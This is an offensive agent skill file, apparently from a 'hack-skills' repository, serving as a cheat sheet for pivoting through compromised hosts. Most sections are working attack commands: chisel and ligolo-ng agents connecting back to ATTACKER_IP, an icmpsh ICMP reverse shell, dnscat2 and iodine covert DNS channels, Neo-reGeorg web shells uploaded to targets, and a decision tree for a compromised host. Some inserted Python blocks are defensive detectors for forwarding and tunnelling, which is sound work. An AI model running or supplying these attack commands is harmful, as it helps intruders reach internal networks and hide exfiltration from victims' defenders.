tunneling-and-pivoting

INSTALLATION
npx skills add https://github.com/yaklang/hack-skills --skill tunneling-and-pivoting
Run in your project or agent environment. Adjust flags if your CLI version differs.

SKILL.md

Forward a local port to a remote service through the pivot.

```bash
# Access INTERNAL_HOST:3306 via localhost:3306
ssh -L 3306:INTERNAL_HOST:3306 user@PIVOT -N

# Access internal web app
ssh -L 8080:10.10.10.100:80 user@PIVOT -N
# Browse: http://localhost:8080

# Bind to all interfaces (share with teammates)
ssh -L 0.0.0.0:8080:INTERNAL:80 user@PIVOT -N
```

Remote Port Forward

Expose a local service to the pivot host's network.

```bash
# Make attacker's port 8000 accessible on pivot as pivot:9000
ssh -R 9000:127.0.0.1:8000 user@PIVOT -N

# Expose attacker's listener to internal network
ssh -R 0.0.0.0:4444:127.0.0.1:4444 user@PIVOT -N
# Internal hosts connect to PIVOT:4444 → reaches attacker:4444
```

Dynamic Port Forward (SOCKS Proxy)

```bash
# Create SOCKS4/5 proxy on localhost:1080
ssh -D 1080 user@PIVOT -N

# Use with proxychains
echo "socks5 127.0.0.1 1080" >> /etc/proxychains4.conf
proxychains nmap -sT -Pn -p 80,443,445 INTERNAL_SUBNET/24

# Or with browser SOCKS proxy → browse internal web apps
```

Jump Host (ProxyJump)

```bash
# Single jump
ssh -J jumphost user@TARGET

# Multiple jumps
ssh -J jump1,jump2 user@TARGET

# SSH config for persistent jump
# ~/.ssh/config
Host internal-target
    HostName 10.10.10.100
    User admin
    ProxyJump user@jumphost.example.com
```
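Every SSH forward above (-L, -R, -D, ProxyJump) is gated by a handful of sshd_config directives on the pivot, and a remote forward bound to 0.0.0.0 only listens on non-loopback addresses when GatewayPorts permits it. The audit below is an added example, not code from the hack-skills repository: it parses a constructed sshd_config, applies the OpenSSH defaults from sshd_config(5) for absent directives, and lists the settings that would let an authenticated user build these pivots.

```python
"""Audit an sshd_config for the forwarding features the SSH pivots above rely on.

Added example, not code from the hack-skills repository: the config text is
constructed, and the defaults come from sshd_config(5) for OpenSSH.
"""
import re
from typing import Dict, List

# OpenSSH defaults from sshd_config(5); a directive absent from the file has this value.
DEFAULTS: Dict[str, str] = {
    "allowtcpforwarding": "yes",  # gates -L, -R and -D entirely
    "gatewayports": "no",         # -R 0.0.0.0:... binds loopback only unless yes/clientspecified
    "permittunnel": "no",         # layer-3 tun devices (ssh -w)
    "permitopen": "any",          # destination restriction for -L / -D
}

# Constructed sample: forwarding left wide open, plus a Match block that must be ignored.
SAMPLE_SSHD_CONFIG = """\
Port 22
PermitRootLogin no            # unrelated directive, ignored
AllowTcpForwarding yes
GatewayPorts clientspecified
PermitTunnel=no
Match User backup
    AllowTcpForwarding no
"""

# Constructed hardened counterpart.
HARDENED_SSHD_CONFIG = """\
AllowTcpForwarding no
GatewayPorts no
PermitTunnel no
"""

_DIRECTIVE = re.compile(r"^([^\s=]+)\s*=?\s*(.*)$")  # sshd accepts 'Key value' and 'Key=value'


def parse_sshd_config(text: str) -> Dict[str, str]:
    """Return the effective global values of the directives in DEFAULTS.

    As in sshd, the first occurrence of a directive wins; everything after the
    first 'Match' line is conditional and not evaluated here.
    """
    effective = dict(DEFAULTS)
    seen = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and surrounding whitespace
        if not line:
            continue
        m = _DIRECTIVE.match(line)
        if not m:
            continue
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "match":
            break
        if key in DEFAULTS and key not in seen:
            effective[key] = value if key == "permitopen" else value.lower()
            seen.add(key)
    return effective


def forwarding_findings(text: str) -> List[str]:
    """List the settings that would let an authenticated user run the pivots above."""
    cfg = parse_sshd_config(text)
    findings = []
    if cfg["allowtcpforwarding"] != "no":
        findings.append(f"AllowTcpForwarding={cfg['allowtcpforwarding']}: -L/-R/-D forwards allowed")
        if cfg["permitopen"] == "any":
            findings.append("PermitOpen=any: local/dynamic forwards may reach any host:port")
    if cfg["gatewayports"] != "no":
        findings.append(f"GatewayPorts={cfg['gatewayports']}: remote forwards can listen on 0.0.0.0")
    if cfg["permittunnel"] != "no":
        findings.append(f"PermitTunnel={cfg['permittunnel']}: layer-3 tun tunnels allowed")
    return findings


if __name__ == "__main__":
    for name, cfg_text in (("sample", SAMPLE_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, forwarding_findings(cfg_text) or ["no forwarding exposure"])
```

Run it against `/etc/ssh/sshd_config` on a bastion or jump host; `Match` blocks are deliberately left out of the global result, so review those by hand when a per-user or per-group exception exists.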

2. CHISEL

Reverse SOCKS Proxy (Most Common)

```bash
# Attacker: start chisel server
chisel server --reverse --port 8080

# Victim: connect back as client, create reverse SOCKS
chisel client ATTACKER_IP:8080 R:socks

# Result: SOCKS5 proxy on attacker's 127.0.0.1:1080
proxychains nmap -sT -Pn INTERNAL/24
```

Port Forwarding

```bash
# Forward specific port
chisel client ATTACKER:8080 R:3306:INTERNAL_DB:3306

# Multiple forwards
chisel client ATTACKER:8080 R:3306:DB:3306 R:8080:WEB:80

# Reverse port forward (expose attacker service to victim network)
chisel client ATTACKER:8080 R:0.0.0.0:4444:127.0.0.1:4444
```

3. LIGOLO-NG

TUN interface-based pivoting — transparent routing without SOCKS.

```bash
# Attacker: start proxy
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
ligolo-proxy -selfcert -laddr 0.0.0.0:11601

# Agent (victim): connect to proxy
ligolo-agent -connect ATTACKER_IP:11601 -ignore-cert

# In ligolo-proxy console:
>> session                    # select agent session
>> ifconfig                   # view agent's network interfaces
>> start                      # start tunnel

# Add routes on attacker to reach internal networks
sudo ip route add 10.10.10.0/24 dev ligolo
sudo ip route add 172.16.0.0/16 dev ligolo
```

Listener (Reverse Shell Catcher Through Pivot)

```bash
# In ligolo-proxy console:
>> listener_add --addr 0.0.0.0:4444 --to 127.0.0.1:4444 --tcp
# Internal hosts connecting to AGENT:4444 → forwarded to attacker:4444
```

Double Pivot

```bash
# Agent 1 on DMZ → tunnel to internal network 1
# Agent 2 on internal network 1 → tunnel to internal network 2
# Add routes for both networks on attacker
sudo ip route add 10.0.0.0/24 dev ligolo    # via agent 1
sudo ip route add 172.16.0.0/24 dev ligolo  # via agent 2
```

4. SOCAT

```bash
# TCP port forward
socat TCP-LISTEN:8080,fork TCP:INTERNAL:80

# UDP relay
socat UDP-LISTEN:53,fork UDP:INTERNAL_DNS:53

# Encrypted tunnel
socat OPENSSL-LISTEN:443,cert=server.pem,verify=0,fork TCP:INTERNAL:80

# File transfer via socat
# Receiver:
socat TCP-LISTEN:9999,fork file:received_file,create
# Sender:
socat TCP:RECEIVER:9999 file:send_file
```

5. PROXYCHAINS / PROXIFIER

ProxyChains Configuration

```
# /etc/proxychains4.conf
strict_chain          # fail if any proxy is down
# dynamic_chain       # skip dead proxies
# random_chain        # randomize proxy order

[ProxyList]
socks5 127.0.0.1 1080        # first hop (SSH dynamic forward)
socks5 127.0.0.1 1081        # second hop (if chaining)
```

```bash
# Usage
proxychains nmap -sT -Pn -p 22,80,445 10.10.10.0/24
proxychains crackmapexec smb 10.10.10.0/24
proxychains evil-winrm -i 10.10.10.50 -u admin -p pass
```

6. WINDOWS PIVOTING

Netsh Port Forwarding

```batch
:: Forward port (requires admin)
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=INTERNAL_IP

:: List forwards
netsh interface portproxy show all

:: Remove
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0
```
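Portproxy rules are a common persistence and pivot artefact because they survive reboots and leave no process to spot. The parser below is an added example, not code from the hack-skills repository: it reads the table printed by `netsh interface portproxy show all` (the sample text is constructed to match that layout) and flags rules that either listen on a network-reachable address or relay to another host. The registry path and service name in the comments are where Windows keeps and serves these rules.

```python
r"""Parse `netsh interface portproxy show all` output and flag forwards that look like pivots.

Added example, not part of the hack-skills repository.  The sample output is
constructed to match netsh's table layout.  Portproxy rules persist under
HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp and are applied by
the IP Helper service (iphlpsvc), so auditing that key is the offline equivalent.
"""
import re
from typing import Dict, List

# Constructed sample: the rule from the cheat sheet above plus a loopback-only rule.
SAMPLE_NETSH_OUTPUT = """\

Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         8080        10.10.10.100    80
127.0.0.1       3389        127.0.0.1       3389
"""

# A data row is: listen-address listen-port connect-address connect-port.
# Header and separator lines never carry bare integers in the port columns, so they do not match.
_ROW = re.compile(r"^\s*(\S+)\s+(\d+)\s+(\S+)\s+(\d+)\s*$")


def parse_portproxy(output: str) -> List[Dict[str, object]]:
    """Turn netsh's table into a list of rule dicts."""
    rules = []
    for line in output.splitlines():
        m = _ROW.match(line)
        if m:
            rules.append({
                "listen_addr": m.group(1), "listen_port": int(m.group(2)),
                "connect_addr": m.group(3), "connect_port": int(m.group(4)),
            })
    return rules


def _is_loopback(addr: str) -> bool:
    return addr.startswith("127.") or addr in ("::1", "localhost")


def suspicious_forwards(output: str) -> List[Dict[str, object]]:
    """Return rules that expose a listener to the network or relay to another host."""
    flagged = []
    for rule in parse_portproxy(output):
        reasons = []
        if not _is_loopback(str(rule["listen_addr"])):
            reasons.append("listener reachable from the network (not loopback)")
        if not _is_loopback(str(rule["connect_addr"])):
            reasons.append("relays to another host (pivot pattern)")
        if reasons:
            flagged.append({**rule, "reasons": reasons})
    return flagged


if __name__ == "__main__":
    # On a live host, feed in subprocess.run(["netsh", "interface", "portproxy", "show", "all"],
    # capture_output=True, text=True).stdout instead of the constructed sample.
    for f in suspicious_forwards(SAMPLE_NETSH_OUTPUT):
        print(f"{f['listen_addr']}:{f['listen_port']} -> {f['connect_addr']}:{f['connect_port']}",
              f["reasons"])
```

A loopback-to-loopback rule is usually benign (local redirection), which is why the second sample row is not flagged; anything that listens on 0.0.0.0 or points at a different host deserves a ticket.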

Plink (PuTTY CLI)

```batch
:: Dynamic SOCKS (like ssh -D)
plink.exe -ssh -D 1080 -N user@ATTACKER

:: Remote port forward
plink.exe -ssh -R 4444:127.0.0.1:4444 user@ATTACKER

:: Automated (non-interactive, accept host key)
echo y | plink.exe -ssh -l user -pw password -R 9050:127.0.0.1:9050 ATTACKER
```

7. DNS TUNNELING

```bash
# iodine — IP-over-DNS
# Server (attacker, with NS record pointing to attacker):
iodined -f -c -P password 10.0.0.1 t1.yourdomain.com
# Client (victim):
iodine -f -P password t1.yourdomain.com
# Creates dns0 interface → route traffic through it

# dnscat2 — command channel over DNS
# Server:
ruby dnscat2.rb yourdomain.com
# Client:
./dnscat --dns=server=ATTACKER,port=53 --secret=SHARED_SECRET
```
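Both tools above carry data in the leftmost DNS label, which is what makes them detectable from resolver logs: labels get long and high-entropy, almost every query name is unique, and bulk record types (TXT, NULL, CNAME) dominate instead of A/AAAA. The scorer below is an added example, not code from the hack-skills repository; the log lines are constructed (the tunnel zone reuses the placeholder domain from the iodine command), and the thresholds are assumptions to tune against a site's own baseline.

```python
"""Score DNS query logs for IP-over-DNS tunnelling patterns (iodine, dnscat2).

Added example, not part of the hack-skills repository.  The log lines are
constructed and the thresholds are assumptions to tune against your baseline.
"""
import math
from collections import defaultdict
from typing import Dict, List

# Constructed log: "client qtype qname".  Six tunnel-shaped queries to the
# placeholder zone from the iodine command above, six benign example.com lookups.
SAMPLE_DNS_LOG = [
    "10.0.0.5 TXT vh3j2k7l9m1n4p6q8r0s5t2u7w1x9y3z4a6b8c0d.t1.yourdomain.com",
    "10.0.0.5 NULL q8r0s5t2u7w1x9y3z4a6b8c0dvh3j2k7l9m1n4p6.t1.yourdomain.com",
    "10.0.0.5 TXT t2u7w1x9y3z4a6b8c0dvh3j2k7l9m1n4p6q8r0s5.t1.yourdomain.com",
    "10.0.0.5 NULL x9y3z4a6b8c0dvh3j2k7l9m1n4p6q8r0s5t2u7w1.t1.yourdomain.com",
    "10.0.0.5 TXT a6b8c0dvh3j2k7l9m1n4p6q8r0s5t2u7w1x9y3z4.t1.yourdomain.com",
    "10.0.0.5 NULL dvh3j2k7l9m1n4p6q8r0s5t2u7w1x9y3z4a6b8c0.t1.yourdomain.com",
    "10.0.0.7 A www.example.com",
    "10.0.0.7 A mail.example.com",
    "10.0.0.7 A api.example.com",
    "10.0.0.8 A www.example.com",
    "10.0.0.8 AAAA cdn.example.com",
    "10.0.0.9 A www.example.com",
]

BULK_QTYPES = {"TXT", "NULL", "CNAME", "MX", "SRV"}  # record types that can carry large payloads


def shannon_entropy(s: str) -> float:
    """Bits per character: ~0 for 'www', above 4 for encoded data."""
    if not s:
        return 0.0
    counts: Dict[str, int] = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def score_zones(lines: List[str], min_queries: int = 5) -> Dict[str, Dict[str, float]]:
    """Aggregate per parent zone and count how many tunnelling signals fire (0-4)."""
    stats = defaultdict(lambda: {"queries": 0, "unique": set(), "lens": [], "ents": [], "bulk": 0})
    for line in lines:
        _client, qtype, qname = line.split()
        labels = qname.rstrip(".").lower().split(".")
        if len(labels) < 3:          # bare domain: no data-carrying label to measure
            continue
        data, zone = labels[0], ".".join(labels[1:])
        st = stats[zone]
        st["queries"] += 1
        st["unique"].add(data)
        st["lens"].append(len(data))
        st["ents"].append(shannon_entropy(data))
        st["bulk"] += qtype.upper() in BULK_QTYPES
    results = {}
    for zone, st in stats.items():
        n = st["queries"]
        if n < min_queries:          # too little traffic to judge
            continue
        avg_len = sum(st["lens"]) / n
        avg_ent = sum(st["ents"]) / n
        signals = [avg_len > 30,                      # long encoded labels
                   avg_ent > 3.5,                     # high entropy labels
                   len(st["unique"]) / n > 0.9,       # nearly every name unique (cache busting)
                   st["bulk"] / n > 0.5]              # bulk record types dominate
        results[zone] = {"queries": n, "avg_label_len": round(avg_len, 1),
                         "avg_entropy": round(avg_ent, 2), "score": sum(signals)}
    return results


def flagged_zones(lines: List[str], threshold: int = 3) -> List[str]:
    """Zones whose signal count reaches the threshold, sorted for stable output."""
    return sorted(z for z, r in score_zones(lines).items() if r["score"] >= threshold)


if __name__ == "__main__":
    for zone, r in score_zones(SAMPLE_DNS_LOG).items():
        print(zone, r)
    print("flagged:", flagged_zones(SAMPLE_DNS_LOG))
```

Grouping by the parent of the leftmost label matches how iodine and dnscat2 shape their names; for zones with deeper delegation, group on the registered domain instead. CDNs and some security products also produce long, unique labels, so treat a score as a triage signal and confirm with query volume per client over time.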

8. ICMP TUNNELING

```bash
# icmpsh — ICMP reverse shell (no raw socket on victim needed for Windows)
# Attacker:
sysctl -w net.ipv4.icmp_echo_ignore_all=1
python3 icmpsh_m.py ATTACKER_IP VICTIM_IP
# Victim (Windows):
icmpsh.exe -t ATTACKER_IP

# ptunnel-ng — TCP-over-ICMP
# Server:
ptunnel-ng -r INTERNAL_HOST -R 22
# Client:
ptunnel-ng -p PIVOT_IP -l 2222 -r INTERNAL_HOST -R 22
ssh -p 2222 user@127.0.0.1
```
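ICMP tunnels stand out from ordinary ping because stock ping sends a fixed payload per host (56 bytes on Linux ping, 32 on Windows ping) at roughly one request per second, while a tunnel carries variable-sized application data and bursts of echo requests. The profiler below is an added example, not code from the hack-skills repository: it reads constructed flow records (one line per echo request) and flags sources whose payload profile or rate departs from that baseline; the thresholds are assumptions.

```python
"""Flag ICMP echo sources whose payload profile suggests a tunnel (ptunnel-ng, icmpsh).

Added example, not part of the hack-skills repository.  Records are constructed
in a simple flow format and the thresholds are assumptions to tune locally.
"""
from collections import defaultdict
from typing import Dict, List, Tuple

# Constructed records: "epoch_seconds src dst icmp_type payload_bytes" (type 8 = echo request).
# 10.10.10.50 bursts large, variable payloads; 10.10.10.20 is an ordinary Linux ping.
SAMPLE_ICMP_RECORDS = [
    "1700000000 10.10.10.50 203.0.113.9 8 1024",
    "1700000000 10.10.10.50 203.0.113.9 8 512",
    "1700000000 10.10.10.50 203.0.113.9 8 1024",
    "1700000001 10.10.10.50 203.0.113.9 8 77",
    "1700000001 10.10.10.50 203.0.113.9 8 1024",
    "1700000001 10.10.10.50 203.0.113.9 8 300",
    "1700000000 10.10.10.20 10.10.10.1 8 56",
    "1700000001 10.10.10.20 10.10.10.1 8 56",
    "1700000002 10.10.10.20 10.10.10.1 8 56",
    "1700000003 10.10.10.20 10.10.10.1 8 56",
    "1700000003 10.10.10.1 10.10.10.20 0 56",   # echo reply, ignored
]

BASELINE_PAYLOADS = {56, 32}  # default ping payload sizes (Linux, Windows)


def profile_sources(records: List[str]) -> Dict[str, Dict[str, object]]:
    """Per source: echo-request count, distinct/max payload sizes, peak requests per second."""
    per_src = defaultdict(lambda: {"count": 0, "sizes": set(), "per_second": defaultdict(int)})
    for rec in records:
        ts, src, _dst, icmp_type, size = rec.split()
        if icmp_type != "8":            # only echo requests carry the client->server leg
            continue
        st = per_src[src]
        st["count"] += 1
        st["sizes"].add(int(size))
        st["per_second"][ts] += 1
    return {
        src: {
            "count": st["count"],
            "distinct_sizes": len(st["sizes"]),
            "max_size": max(st["sizes"]),
            "peak_pps": max(st["per_second"].values()),
            "non_baseline": not (st["sizes"] <= BASELINE_PAYLOADS),
        }
        for src, st in per_src.items()
    }


def tunnel_suspects(records: List[str], max_payload: int = 64,
                    max_distinct: int = 2, max_pps: int = 2) -> List[Tuple[str, List[str]]]:
    """Sources that exceed any threshold, with the reasons, sorted by address."""
    suspects = []
    for src, p in profile_sources(records).items():
        reasons = []
        if p["max_size"] > max_payload:
            reasons.append(f"payload up to {p['max_size']} bytes")
        if p["distinct_sizes"] > max_distinct:
            reasons.append(f"{p['distinct_sizes']} distinct payload sizes")
        if p["peak_pps"] > max_pps:
            reasons.append(f"{p['peak_pps']} echo requests in one second")
        if reasons:
            suspects.append((src, reasons))
    return sorted(suspects)


if __name__ == "__main__":
    for src, reasons in tunnel_suspects(SAMPLE_ICMP_RECORDS):
        print(src, reasons)
```

Payload size alone is not proof (ping -s is legitimate), so the scorer wants at least one of variability or rate alongside it before anyone pages an analyst; the per-source profile is returned so that threshold can be adjusted without re-parsing.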

9. HTTP TUNNELING

```bash
# Neo-reGeorg — SOCKS proxy via web shell
# Generate tunnel web shell:
python3 neoreg.py generate -k PASSWORD
# Upload tunnel.php/aspx/jsp to target web server
# Connect:
python3 neoreg.py -k PASSWORD -u http://TARGET/tunnel.php
# SOCKS proxy on 127.0.0.1:1080

# Tunna — HTTP tunnel (alternative)
python2 proxy.py -u http://TARGET/conn.php -l 4444 -r 3389 -a INTERNAL_IP
```

10. PIVOTING DECISION MATRIX

| Egress Allowed | Tool | Notes |
|---|---|---|
| TCP outbound (any port) | Chisel, Ligolo-ng, SSH | Fastest setup |
| TCP 80/443 only | Chisel (HTTP/S), Neo-reGeorg | Blend with web traffic |
| DNS only (53/udp) | iodine, dnscat2 | Slow but stealthy |
| ICMP only | ptunnel-ng, icmpsh | Very restricted environments |
| No outbound | Bind shell + port forward in | Needs inbound access to pivot |
| Web shell only | Neo-reGeorg, Tunna | When only HTTP file upload works |

11. DECISION TREE

```text
Compromised host — need to reach internal network
│
├── Can install tools on pivot?
│   ├── YES + outbound TCP allowed?
│   │   ├── Need transparent routing? → Ligolo-ng (§3)
│   │   ├── Need SOCKS proxy? → Chisel reverse SOCKS (§2)
│   │   └── SSH available? → SSH dynamic forward (§1)
│   │
│   ├── YES + only HTTP(S) outbound?
│   │   ├── Chisel over HTTPS (§2)
│   │   └── Upload web tunnel → Neo-reGeorg (§9)
│   │
│   ├── YES + only DNS outbound?
│   │   └── iodine or dnscat2 (§7)
│   │
│   └── YES + only ICMP allowed?
│       └── ptunnel-ng or icmpsh (§8)
│
├── Cannot install tools (web shell only)?
│   └── Neo-reGeorg / Tunna via web shell (§9)
│
├── Windows pivot?
│   ├── Admin access? → netsh portproxy (§6)
│   ├── SSH client available? → ssh.exe (Windows 10+) (§1)
│   └── Outbound SSH? → plink (§6)
│
├── Need multi-layer pivot?
│   ├── Ligolo-ng: multiple agents + route stacking (§3)
│   ├── SSH ProxyJump chaining (§1)
│   └── ProxyChains with multiple SOCKS (§5)
│
└── Teammate needs access too?
    ├── Bind SOCKS on 0.0.0.0 (ssh -L 0.0.0.0:...)
    └── Share Ligolo-ng routes via common proxy
```